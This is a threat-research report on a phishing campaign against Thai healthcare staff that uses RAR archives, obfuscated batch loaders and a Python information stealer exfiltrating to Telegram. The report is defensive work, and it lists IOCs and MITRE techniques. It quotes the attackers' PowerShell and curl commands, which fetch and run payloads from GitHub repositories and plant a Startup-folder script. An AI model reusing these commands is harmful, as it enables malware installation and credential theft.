Authors: Vaibhav Krushna Billade, Dixit Panchal & Rumana Siddiqui.
Table of Contents
- Introduction
- Key Targets
- Infection Chain
- Initial Campaign Findings
- Technical Analysis
- Stage 1: Initial Delivery (RAR Archive)
- Stage 2: Rouki-Obfuscated Batch Loader
- Stage 3: Startup Persistence Script
- Stage 4: Secondary Payload Execution
- Stage 5: Information Stealer Deployment (sim.py)
- Conclusion
- Seqrite Coverage
- Indicators of Compromise (IOCs)
- MITRE ATT&CK Mapping
Introduction
Seqrite Threat Research Unit (TRU) actively tracks and analyses threat actors and their campaigns, focusing on attribution, infrastructure analysis, and adversary tradecraft. Throughout our research, we have attributed numerous operations to China-aligned and other threat clusters targeting both regional and international entities.
During a recent investigation, we identified an active malware campaign targeting Thailand’s healthcare sector, including Ministry of Health personnel and affiliated healthcare organizations. The campaign leverages healthcare-themed spear-phishing lures distributed through malicious RAR archives containing obfuscated batch scripts and executable payloads. The infection chain employs multiple stages of obfuscation, GitHub-hosted payload delivery, persistence mechanisms, and information-stealing malware designed to establish a foothold within targeted environments while evading detection.
Key Targets
The campaign primarily targets personnel and departments across Thailand’s healthcare ecosystem, including:
- Ministry of Health personnel and government health procurement teams through lures impersonating official medical equipment approval documents.
- Hospital administration staff through fabricated patient admission request documents.
- Radiology and dental clinic staff through spoofed medical records and X-ray inquiry files.
- Clinical and radiological departments through fake patient CT scan result documents.
- Healthcare supply chain and medical equipment procurement teams through Ministry of Health-branded approval documents.
The lure themes suggest deliberate targeting of healthcare-related functions and demonstrate a strong understanding of operational workflows within the sector.
Infection Chain
RAR Archive → Obfuscated BAT Loader → Rouki-Obfuscated Payload Loader → Startup Persistence Script (WindowSecuryt.bat) → Secondary Batch Payload (u-t2.bat) → Python-Based Information Stealer (sim.py) → Telegram Exfiltration Attempts
Initial Campaign Findings
The earliest identified sample associated with the campaign was uploaded on April 7, 2026, while the most recent observed sample was uploaded on June 3, 2026, indicating an active operational window of approximately ten weeks at the time of analysis.
Key Observations
- All identified samples were uploaded from Thailand, suggesting the use of in-country staging infrastructure or compromised local systems for distribution.
- The threat actor distributes malware through RAR archives containing malicious batch scripts and executables disguised as healthcare- and government-related documents.
- Lure filenames are tailored to specific job functions, including administrative, clinical, radiology, and procurement personnel, indicating either prior reconnaissance of healthcare organizations or a broad targeting strategy informed by sector-specific knowledge.
- All observed samples utilize a consistent RAR → BAT → Payload execution chain, suggesting a standardized toolset and repeatable delivery methodology.
Technical Analysis
Stage 1: Initial Delivery (RAR Archive)
The initial infection vector consists of a malicious RAR archive containing an obfuscated batch file that functions as the first-stage loader. Obfuscation is employed extensively to conceal functionality and hinder static analysis.
One observed sample, Health_Ministry_Approved_Equipment_2026.bat, creates a temporary file containing encoded payload data and leverages PowerShell to decode the embedded content. The decoded content is then written to a secondary batch file, which is subsequently executed.
Following execution, temporary artifacts are removed to reduce forensic evidence and complicate post-compromise investigations.
The use of embedded payload data, PowerShell-based decoding routines, and cleanup operations indicates a deliberate effort to conceal malicious functionality and evade security controls.
Stage 2: Rouki-Obfuscated Batch Loader
The decoded payload.bat executed during Stage 1 was heavily obfuscated using a framework identified as Rouki.
Analysis revealed that the script dynamically reconstructs and executes PowerShell commands that download, persist, and execute additional malware components. The use of GitHub-hosted payloads, deceptive file extensions, and multi-stage execution provides operational flexibility while reducing the likelihood of detection.
PowerShell Command 1 – Persistence Deployment
powershell.exe -WindowStyle Hidden -Command “[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile(‘https://github.com/ud-7-te/ud-vtn/raw/main/up-t2.png’, ‘C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowSecuryt.bat’);”
This command downloads a remotely hosted file masquerading as a PNG image and stores it as WindowSecuryt.bat within the Windows Startup folder.
Placement within the Startup directory ensures automatic execution whenever the user logs into the system, thereby establishing persistence.
PowerShell Command 2 – Payload Deployment
powershell.exe -Command “[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile(‘https://github.com/d7-te/vtn/raw/main/T2.zip’, ‘C:\Users\Public\Desktops.zip’); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory(‘C:\Users\Public\Desktops.zip’, ‘C:\Users\Public\Desktops’); Start-Sleep -Seconds 1; C:\Users\Public\Desktops\python C:\Users\Public\Desktops\Lib\sim.py; del C:\Users\Public\Desktops.zip”
This command downloads a ZIP archive, extracts its contents to a publicly accessible directory, and executes the embedded Python-based payload (sim.py) using a bundled Python interpreter.
After execution, the ZIP archive is deleted to minimize forensic artifacts and hinder incident response efforts.
Stage 3: Startup Persistence Script (WindowSecuryt.bat)
Analysis of the downloaded WindowSecuryt.bat script revealed that it contains a significant amount of junk data and obfuscation logic similar to that observed in earlier-stage batch loaders. This non-functional content is intended to hinder static analysis and conceal the script’s true execution flow.
Upon execution, the script performs a privilege check and environment setup before reaching its final functional stage, where it reconstructs and executes the following command:
cmd /c “curl hxxps://raw.githubusercontent.com/ud-7-te/ud-vtn/main/ud-t2.txt -o C:\Users\admin\AppData\Local\Temp\u-t2.bat && call C:\Users\admin\AppData\Local\Temp\u-t2.bat”
This command uses curl to download an additional batch payload (u-t2.bat) from a GitHub-hosted repository and stores it in the system’s temporary directory (%TEMP%). The use of the %TEMP% path ensures write access without requiring elevated permissions in most environments.
After successful download, the script immediately executes the payload using the call command, enabling continuation of the multi-stage infection chain.
The combination of Startup-folder persistence and remotely retrievable payloads enables the threat actor to update malicious functionality without modifying the original persistence mechanism.
In addition, the script’s placement within the Windows Startup folder provides persistence, ensuring it is automatically executed upon user logon. This allows the threat actor to repeatedly retrieve and execute updated payloads from the remote GitHub infrastructure without modifying the original persistence mechanism, enabling flexible and long-term control over the infection chain.
Stage 4: Secondary Payload Execution (u-t2.bat)
Analysis of the downloaded u-t2.bat script revealed that it contains junk code and obfuscated sections similar to earlier batch components in the infection chain. These non-functional elements appear at the beginning of the script and are intended to hinder static analysis and conceal the actual execution flow. The meaningful logic is embedded deeper within these obfuscated segments and is resolved only during runtime execution.
The script attempts to relaunch itself with elevated privileges to gain higher-level access on the system.
Upon successful elevation, the script proceeds to execute the next-stage payload while minimizing user visibility.
The final stage of execution triggers the following payload:
powershell.exe -WindowStyle Hidden -Command “C:\Users\Public\Desktops\python C:\Users\Public\Desktops\Lib\sim.py”
This command launches the previously deployed Python interpreter and executes sim.py while suppressing visible execution windows.
The use of a bundled Python runtime enables execution independent of any existing Python installation on the victim system and reduces deployment dependencies.
Stage 5: Information Stealer Deployment (sim.py)
The final payload identified during analysis is sim.py, a Python-based information stealer executed through the bundled Python environment.
Following execution, the malware terminates multiple web browsers, including Google Chrome, Microsoft Edge, Brave, and other Chromium-based browsers using taskkill commands. This behavior is commonly associated with information-stealing malware seeking access to browser databases, credential stores, cookies, and session artifacts that may otherwise be locked by active processes.
Observed Capabilities
- Collects browser-related data.
- Harvests stored credentials and session information.
- Stages collected data within temporary directories.
- Compresses harvested data into ZIP archives.
- Attempts exfiltration through Telegram-based infrastructure.
Execution logs revealed repeated attempts to transmit stolen data to attacker-controlled Telegram channels using hardcoded bot tokens and chat identifiers via the Telegram Bot API.
The exfiltration requests included victim-specific metadata such as:
- System identifiers
- Username information
- Harvested data counters
- Archive references
Although observed exfiltration attempts failed due to connectivity timeouts when communicating with api.telegram.org, the combination of browser data harvesting, local staging, archive creation, and attempted transmission confirms the payload’s information-stealing capabilities.
Overall, the malware exhibits characteristics commonly associated with modern Python-based stealers, including credential theft, session cookie harvesting, local data staging, archive generation, and Telegram-based exfiltration mechanisms.
The use of GitHub-hosted payload delivery, legitimate system utilities, layered obfuscation, and multi-stage execution contributes to both operational flexibility and defence evasion.
Conclusion
TRU assesses with moderate confidence that this campaign represents a targeted effort against Thailand’s healthcare sector, leveraging healthcare-themed social engineering lures, multi-stage batch loaders, GitHub-hosted payload infrastructure, and Python-based information-stealing malware.
The campaign demonstrates a repeatable delivery methodology consisting of RAR archives, heavily obfuscated batch scripts, persistence through Startup folder abuse, staged payload retrieval, and Telegram-based exfiltration attempts.
While no definitive attribution could be established based on the currently available evidence, the operational consistency observed across samples suggests the activity is being conducted by a single threat actor or closely related cluster. Continued monitoring of associated infrastructure, payload evolution, and victimology may provide additional insights into attribution and campaign objectives.
Organizations within the healthcare sector should remain vigilant against document-themed phishing campaigns, monitor for unauthorized Startup-folder modifications, and restrict the execution of untrusted scripts and binaries obtained from external sources.
Seqrite Coverage:
- Script.Trojan.Downloader.50836.GC
- cld.script.trojan.1759432951
Indicators of Compromise (IOCs):
| File Name | SHA256 |
| Health_Ministry_Approved_Equipment_2026.rar | E5F6D9D405819E6B05B5D8268A2E973294859AD65237EDE36AB612B536D0AC2B |
| Health_Ministry_Approved_Equipment_2026.bat | 4EEBC38297A307D18784D6F9EBC8AA6E6F69860BE970CC70D9E544DEB1FF6CE0 |
| payload.bat | F4D4B8CAC004BB63834C6DF436721BABD9464C09787C80B268D839E0AADA9F87 |
| WindowSecuryt.bat | 74BB6AD7E1310F30A3E24FD3CBBFFA2C0C41C64E89E5D0DD1D6900E96B914183 |
| u-t2.bat | 7709D8C34D490509F3624104611EB75A862944DD9D7A642F44514ADA16C85EE9 |
| Desktops.zip | 523388567630E4FBDC359F75232BF2AD82671A680D4BFDCE0237FC30DFEC4C80 |
| Stealer (SIM.PY) | 442E0F4E822842922E7E4685840194E99FD68C7F0EC38C1925914B8F724D5865 |
MITRE ATT&CK Mapping:
| Tactic | Technique Name | Technique ID |
| Initial Access | Phishing: Spear phishing Attachment | T1566.001 |
| Execution | Command and Scripting Interpreter: Windows Command Shell | T1059.003 |
| Command and Scripting Interpreter: PowerShell | T1059.001 | |
| User Execution: Malicious File | T1204.002 | |
| Defense Evasion | Obfuscated Files or Information | T1027 |
| Masquerading (BAT disguised as PNG/TXT) | T1036 | |
| Indicator Removal on Host: File Deletion | T1070.004 | |
| Persistence | Registry Run Keys / Startup Folder | T1547.001 |
| Scheduled Execution via Startup Folder | T1547 | |
| Privilege Escalation | Abuse Elevation Control Mechanism | T1548 |
| Discovery | System Owner/User Discovery | T1033 |
| Credential Access | Credentials from Password Stores | T1555 |
| Credentials from Web Browsers | T1555.003 | |
| Collection | Archive Collected Data | T1560 |
| Data from Local System | T1005 | |
| Data from Information Repositories | T1213 | |
| Command and Control | Ingress Tool Transfer (GitHub-hosted payloads) | T1105 |
| Application Layer Protocol: Web Protocols (HTTPS) | T1071.001 | |
| Proxy Through Legitimate Services (GitHub) | T1102 | |
| Exfiltration | Exfiltration Over Web Service (Telegram Bot API) | T1567 |
| Exfiltration to Cloud Storage/Web Service | T1567.002 |
